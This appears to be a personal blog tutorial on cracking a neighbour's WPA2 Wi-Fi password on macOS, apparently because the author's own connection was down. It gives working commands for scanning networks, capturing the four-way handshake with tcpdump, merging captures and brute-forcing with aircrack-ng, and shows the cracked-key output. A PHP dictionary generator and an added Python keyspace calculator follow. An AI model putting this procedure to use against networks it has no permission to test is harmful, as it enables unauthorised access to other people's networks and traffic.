The Wi-Fi at home broke, and my Mac happened to be idle, so I tried my hand at Wi-Fi cracking.
1. Install and update aircrack-ng
brew install aircrack-ng
2. Sniff nearby Wi-Fi networks
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
airport -s
This yields data like the following:
SSID | BSSID | RSSI | CHANNEL | HT | CC | SECURITY (auth/unicast/group) |
iPhone | e2:89:7e:af:02:b8 | -63 | 6 | Y | CN | WPA2(PSK/AES/AES) |
3. Start capturing the Wi-Fi handshake
sudo airport en0 sniff 1
Here is the problem: on macOS 10.14 Mojave this crashes with a segmentation fault:
Capturing 802.11 frames on en0.
Segmentation fault: 11
So we use tcpdump to listen instead.
# Disconnect from the current Wi-Fi network
$ sudo airport -z
# Set the sniffing channel to 1
$ sudo airport -c1
# Check that the channel was set
$ sudo airport -c
chancek:1
Here comes the key part!
# Replace $BSSID here with the MAC address of the target Wi-Fi (e2:89:7e:af:02:b8)
$ sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en1 -w beacon.cap
tcpdump: listening on en1, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes
1 packet captured
83 packets received by filter
0 packets dropped by kernel
# "Got 0": no handshake yet, wait for a client to connect to the Wi-Fi
$ sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en1 -w cap.cap
tcpdump: listening on en1, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes
Got 0
# "Got 4": when a client connects, all four handshake messages are captured
$ sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en1 -w cap.cap
tcpdump: listening on en1, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes
Got 4
4. Merge the cap files
$ mergecap -a -F pcap -w result.cap beacon.cap cap.cap
If you get "mergecap: command not found", install Wireshark:
$ brew install wireshark
$ mergecap -a -F pcap -w result.cap beacon.cap cap.cap
5. Run the password dictionary
$ aircrack-ng -w password.txt result.cap
The result looks like this:
Aircrack-ng 1.6
[00:00:00] 8/10 keys tested (57.73 k/s)
Time left: --
KEY FOUND! [ 88888 ]
Master Key : 8B B1 AF 60 79 19 94 C5 FD 5A 4C 61 A9 9A E7 40
8B CF FB 88 7D AE 1F 02 E6 ED AF DE C3 5B E9 39
Transient Key : A1 1D EC EB 4D D9 0B 9B 18 46 15 E2 29 B2 43 AD
4D FB 3C 70 69 15 95 DA BF 04 93 A6 39 A9 FC EC
91 3E 81 B8 20 BC 79 D7 AC C8 C5 24 97 D2 5E DA
38 15 00 75 37 E8 B8 90 63 09 06 B0 E4 19 F6 A6
EAPOL HMAC : DD 7F 07 A1 43 DF E2 C6 DC D8 7F 69 1C BC E3 41
6. Obtaining a password dictionary
First, there are many open-source password dictionaries on GitHub that you can use.
But to crack one specific Wi-Fi network, you need a dictionary tailored to it.
I used a brute-force approach:
an exhaustive character-selection algorithm plus an exhaustive permutation algorithm
to produce every possible password string.
Character set: uppercase letters + lowercase letters + digits
(four of the characters in the sequence were already known)
The maximum number of 4-character mixed candidates is 14776336.
Because the characters in the four positions are not repeated,
this gives 13388280 password candidates.
The algorithm is as follows:
<?php
/**
 * test.php
 * Created by PhpStorm.
 * Date: 2020-02-20
 * Time: 6:06
 * Author: G.Q
 * E-mail: yiyezhiqiutel@gmail.com
 */

// ---- Function section ----

// Return every combination (no repeated elements, order ignored) of $arr of
// size $num, $num-1, ..., 1. Only the size-$num combinations are used below.
function getSequenceAry($arr, $num = 1)
{
    $count = count($arr);
    $min = min($count, $num);
    if ($min < 1) {
        return false;
    }
    $return = array();
    for (; $min >= 1; $min--) {
        $arrRet = array();
        $max = $count - ($min - 1);   // leave enough elements after $i to fill the remaining slots
        for ($i = 0; $i < $max; $i++) {
            getSequenceArySub($arr, $count, $min, $i, $arrRet, $return);
        }
    }
    return $return;
}

// Recursive helper: put $arr[$i] into slot $min-1 and fill the remaining slots
// from the elements after index $i. Results are appended to $return by reference.
// (The original declared $arrRet with a default value before the required &$return,
// which PHP 8 reports as deprecated; the default has been dropped since every
// caller passes it explicitly.)
function getSequenceArySub($arr, $count, $min, $i, $arrRet, &$return)
{
    if (empty($arr) || empty($count)) {
        return false;
    }
    if (1 == $min) {
        $arrRet[--$min] = $arr[$i];
        $return[] = $arrRet;
    } else {
        $arrRet[--$min] = $arr[$i];
        for ($j = $i + 1; $j < $count; $j++) {
            getSequenceArySub($arr, $count, $min, $j, $arrRet, $return);
        }
    }
}

// Return all orderings (permutations) of the elements of $arr, each joined into a string.
function getSequenceStr($arr)
{
    if (count($arr) == 1) {
        return $arr;
    }
    $arrRet = array();
    foreach ($arr as $k => $v) {
        $arr2 = $arr;
        unset($arr2[$k]);
        $arrOrderList = getSequenceStr($arr2);
        foreach ($arrOrderList as $order) {
            $arrRet[] = $v . $order;
        }
    }
    return $arrRet;
}

// ---- Run section ----
$ret = getSequenceAry(["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"], 4);
$count = 0;
$fileNum = 1;
foreach ($ret as $v) {
    if (count($v) != 4) continue;   // keep only the 4-character combinations
    $res = getSequenceStr($v);
    foreach ($res as $vv) {
        $count++;
        // Uncomment to write the candidates to a file, prefixed with the four known characters:
        // $filename = "./" . $fileNum . ".txt";
        // $handle = fopen($filename, "a+");
        // $str = fwrite($handle, "6uYn" . $vv . "\n");
        // set_time_limit(0);
    }
}
// fclose($handle);
echo $count;
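As an added illustration (my own Python, not the post's PHP script), the calculator below reproduces the two counts stated above, shows that the script's "combinations, then all orderings" strategy is exactly nPr, and converts a candidate count into worst-case cracking time at the 57.73 k/s rate aircrack-ng reported in the post; it also goes beyond the post's 4-character case to show how quickly the search grows with each additional unknown character. The rate and the 62-symbol alphabet are taken from the post; the 6- and 8-character rows are my own extension.

```python
from math import comb, factorial, perm

# Alphabet used by the post: uppercase + lowercase + digits (62 symbols).
ALPHABET_SIZE = 26 + 26 + 10


def keyspace(alphabet_size: int, unknown_positions: int, allow_repeats: bool) -> int:
    """Number of candidate strings for the unknown positions of a passphrase.

    allow_repeats=True  -> alphabet_size ** n   (the post's 14776336 for n=4)
    allow_repeats=False -> ordered selections without repetition, nPr
                           (the post's 13388280 for n=4)
    """
    if unknown_positions < 0 or alphabet_size <= 0:
        raise ValueError("bad keyspace parameters")
    if allow_repeats:
        return alphabet_size ** unknown_positions
    if unknown_positions > alphabet_size:
        return 0  # cannot pick more distinct symbols than the alphabet has
    return perm(alphabet_size, unknown_positions)


def combos_times_orderings(alphabet_size: int, n: int) -> int:
    """What the post's PHP script enumerates: every size-n combination
    (getSequenceAry) expanded into all n! orderings (getSequenceStr).
    This equals perm(alphabet_size, n), i.e. keyspace(..., allow_repeats=False)."""
    return comb(alphabet_size, n) * factorial(n)


def seconds_to_exhaust(candidates: int, keys_per_second: float) -> float:
    """Worst-case time to try every candidate at a given cracking rate."""
    if keys_per_second <= 0:
        raise ValueError("rate must be positive")
    return candidates / keys_per_second


if __name__ == "__main__":
    rate = 57.73e3  # keys/s reported by aircrack-ng in the post
    # The post's case: 4 unknown characters of an otherwise known passphrase.
    print(f"4 unknown, repeats allowed:    {keyspace(ALPHABET_SIZE, 4, True):,d}")
    print(f"4 unknown, no repeats (script): {combos_times_orderings(ALPHABET_SIZE, 4):,d}")
    # Extension beyond the post: more unknown characters at the same rate.
    for n in (4, 6, 8):
        full = keyspace(ALPHABET_SIZE, n, True)
        hours = seconds_to_exhaust(full, rate) / 3600
        print(f"{n} unknown chars: {full:>22,d} candidates, {hours:,.1f} h at {rate:,.0f} keys/s")
```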
7. Afterword
1. Don't be afraid of the hassle: run the dictionaries from the internet against it first.
2. Before starting for real, test the whole process once on your own Wi-Fi.
3. The wireless card on the Raspberry Pi 4B board does not support monitor mode,
so if you want to do this with a Raspberry Pi, don't waste your time.
4. It is best to sudo to root before you begin.
5. Also have a look at hashcat and online HashCrack services.
PS: Later I could write a script to automate all of this.
References:
https://www.saltwaterc.eu/capturing-wpa-handshakes-with-os-x.html